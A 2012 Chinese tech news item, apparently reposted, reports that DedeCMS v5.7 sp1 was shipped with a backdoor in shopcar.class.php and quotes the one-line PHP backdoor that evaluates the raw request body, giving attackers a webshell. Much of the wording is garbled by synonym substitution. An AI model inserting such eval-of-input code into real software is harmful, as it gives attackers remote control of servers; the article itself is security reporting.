传织梦CMS系统被植入后门 网站控制权恐遭窃取

作者:Lgo100 来源:未知 2012-03-22 11:37:03 阅读 我要评论 直达商品

  DoNews 3月22日动静 据动静人士对DoNews透露,PHP开源网站打点系统织梦CMS(DedeCms)v5.7 sp1版本被植入后门,黑客可经由过程此后门直接获得网站的节制权限,获取存储在处事器尚?罾υ?件和数据库。

  据悉,织梦CMS(Dedecms)v5.7 sp1版本的中的shopcar。class。php文件被植入一句后门代码“@eval(file_get_contents(‘php://input’));”。经由过程操作该后门,黑客只需机关简单的数据包提交各处事器,就能获取到该网站的WebShell,经由过程对处事器进一步渗入抨击袭击,进而获取处事器的最高权限。

织梦CMS裂痕示意图

  另据CMS官方数据显示,今朝约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及小我网站等。(完)


  推荐阅读

  谷歌Wave将于4月30日关闭 提醒用户导出数据

DoNews 3月22日动静 3月22日,谷歌公司向旗下Wave用户发送邮件,奉告用户Wave处事将于2012年4月30日封锁,提醒用户尽早将主要数据年夜Wave账户中导出。 邮件暗示,谷歌Wave将于2012年4月30日封锁,用户可在封锁前继续>>>详细阅读


本文标题:传织梦CMS系统被植入后门 网站控制权恐遭窃取

地址:http://www.lgo100.com/a/xie/20120322/43183.html

顶一下

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
我的评论: 人参与评论
验证码: 匿名回答
网友评论(点击查看更多条评论)
友情提示: 登录后发表评论,可以直接从评论中的用户名进入您的个人空间,让更多网友认识您。
自媒体专栏

评论

热度